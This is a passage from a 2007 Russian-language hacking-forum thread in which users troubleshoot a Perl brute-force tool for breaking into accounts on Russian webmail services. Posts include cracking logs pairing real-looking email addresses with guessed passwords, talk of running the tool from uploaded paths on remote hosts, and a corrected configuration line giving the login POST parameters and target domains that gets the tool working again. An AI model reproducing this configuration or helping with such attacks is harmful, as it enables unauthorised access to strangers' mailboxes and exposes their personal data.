HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 12.03.2007, 20:54
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
С нами: 10556706

Репутация: -1
По умолчанию

вот ответ на другом сервере
тут perl 5.8.7 но опять проблемы с потоками вроде этого модуля нет
выложи старую версию брута без многопоточности
Код:
perl /usr/local/www/uploads/dhomo.pl
/usr/local/www/uploads/dhomo.pl line 4:

This Perl hasn't been configured and built properly for the threads
module to work.  (The 'useithreads' configuration option hasn't been used.)

Having threads support requires all of Perl and all of the XS modules in
the Perl installation to be rebuilt, it is not just a question of adding
the threads module.  (In other words, threaded and non-threaded Perls
are binary incompatible.)

If you want to the use the threads module, please contact the people
who built your Perl.

Cannot continue, aborting.
BEGIN failed--compilation aborted at /usr/local/lib/perl5/5.8.7/mach/threads.pm
line 28.
Compilation failed in require at /usr/local/www/uploads/dhomo.pl line 4.
BEGIN failed--compilation aborted at /usr/local/www/uploads/dhomo.pl line 4.
 
Ответить с цитированием

  #42  
Старый 13.03.2007, 23:40
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
С нами: 10556706

Репутация: -1
По умолчанию

однопоточный заработал но теперь другая проблема
не находит правильный пароль на хосте

а на моем компе находит

Starting bruteforce at Tue Mar 13 21:24:15 2007
fudobat@photofile.ru;parol
Ending bruteforce at Tue Mar 13 21:24:29 2007
Passwords founded: 1. Time remaining: 14 sec

на хосте

Starting bruteforce at Tue Mar 13 22:16:58 2007
Ending bruteforce at Tue Mar 13 22:17:11 2007
Passwords founded: 0. Time remaining: 13 sec

наверное дедик придется покупать
 
Ответить с цитированием

  #43  
Старый 14.03.2007, 22:47
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
С нами: 10556706

Репутация: -1
По умолчанию

Цитата:
Сообщение от Digimortal  
этого точно небудет..
просто я считаю полный перебор в данном случае не особо эффективым средством.. кто занимается брутом мыл, я думаю, со мною согласятся.. в конце концов, всегда можно создать нужный словарь из необходимых символов..
а я думаю что добавить прямой перебор именно цифр до 8 символов
имеет смысл такой словарь весит около 1Gb и залить его
проблематично а вот сбрутить вполне реально тем более что
цифровые пароли встречаются довольно часто

с брутом от genom та же фигня у себя работает на хостах нет
 
Ответить с цитированием

  #44  
Старый 14.03.2007, 23:34
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
С нами: 10378404

Репутация: 1095


По умолчанию

>> такой словарь весит около 1Gb и залить его проблематично

зачем заливать, когда можно его сгенерировать? (если место есть свободное, конечно)
может позже сделаю такую функцию + брут по маске..

>> с брутом от genom та же фигня у себя работает на хостах нет

потому что проблема не в бруте, а в твоем хосте.. поищи другой..
 
Ответить с цитированием

  #45  
Старый 17.03.2007, 00:03
Murt@zaa
Новичок
Регистрация: 27.08.2006
Сообщений: 24
С нами: 10370638

Репутация: 29
По умолчанию

Всем здорова! Вот проблема возникла: сначало сбрутился пароль для одного ящика, я заюзал его а почтовик пишет неверный пароль, ну думаю ладно, дальше у всех сбрученых ящиков такая же фигня. Но потом для ящиков стал выдавать по несколько паролей такие как: mailpassword, qwerty, passwd. Ну так подскажите в чем траблы? Может у меня руки кривые
 
Ответить с цитированием

  #46  
Старый 17.03.2007, 02:45
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
С нами: 10378404

Репутация: 1095


По умолчанию

ты бы хоть написал какой домен/домены ты брутил.. словарь большой был? ошибки появлялись?

Последний раз редактировалось Digimortal; 17.03.2007 в 02:48..
 
Ответить с цитированием

  #47  
Старый 17.03.2007, 10:55
MartinIg
Новичок
Регистрация: 07.03.2007
Сообщений: 18
С нами: 10094214

Репутация: 1
По умолчанию

5 сайтов тестил, на 2х брут работал
 
Ответить с цитированием

  #48  
Старый 17.03.2007, 15:41
Murt@zaa
Новичок
Регистрация: 27.08.2006
Сообщений: 24
С нами: 10370638

Репутация: 29
По умолчанию

2 Digimortal вот записи из лога:
Код:
mtv2002@pisem.net;qwerty
mtv2002@pisem.net;mailpassword
vector@rbcmail.ru;passw
vector@rbcmail.ru;qwerty
vector@rbcmail.ru;admin
vector@rbcmail.ru;mailpassword
vector@rbcmail.ru;passwd
Файл с паролями содержит всего 12 записей, а вот с мэйлами весит 748 кб. Хотя щас поробую брутеру только несколько мэйлов скормить, может и получится нормально.
Кстати ошибок ни каких не было, тьфу-тьфу:~)

Вот оставил только два ящика, словарь с паролями такой же маленький:
Код:
mtv2002@pisem.net;passwd
mtv2002@pisem.net;admin
mtv2002@pisem.net;12345
mtv2002@pisem.net;mailpassword
mtv2002@pisem.net;passw
mtv2002@pisem.net;qwerty
vector@rbcmail.ru;passwd
vector@rbcmail.ru;admin
vector@rbcmail.ru;12345
vector@rbcmail.ru;mailpassword
vector@rbcmail.ru;passw
vector@rbcmail.ru;qwerty
Причем ни один из этих паролей не подходит.
Незнаю я уже че еще можно придумать.

Последний раз редактировалось Koller; 17.03.2007 в 16:19..
 
Ответить с цитированием

  #49  
Старый 17.03.2007, 19:11
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
С нами: 10378404

Репутация: 1095


По умолчанию

Murt@zaa, тут проблема всего лишь в том, что на хотбоксе произошли некоторые изменения..
а потому следует слекга подправить вторую строку в базе скрипта, чтоб все нормально работало:

['www.pochta.ru', 'reason=login&lng=ru&rnd=123456789&user=zlogin&dom ain=zdomain&pass=zpass&rememb=0', '/login.php', 'http://www6.pochta.ru/index.php?lng=ru', 350, 'Set-Cookie: id=', 'pochta.ru', 'fromru.com', 'pochtamt.ru', 'hotbox.ru', 'krovatka.net', 'rbcmail.ru', 'front.ru', 'pop3.ru', 'land.ru', 'smtp.ru', 'mail15.com', 'mail333.com', 'pisem.net']
 
Ответить с цитированием

  #50  
Старый 18.03.2007, 00:38
Murt@zaa
Новичок
Регистрация: 27.08.2006
Сообщений: 24
С нами: 10370638

Репутация: 29
По умолчанию

2 Digimortal большое спасибо все исправил, все работает как часы.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ? UnKn0wN Уязвимости Mail-сервис 32 08.04.2006 04:20
Скрипт для брута... Allen PHP 4 07.03.2006 01:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.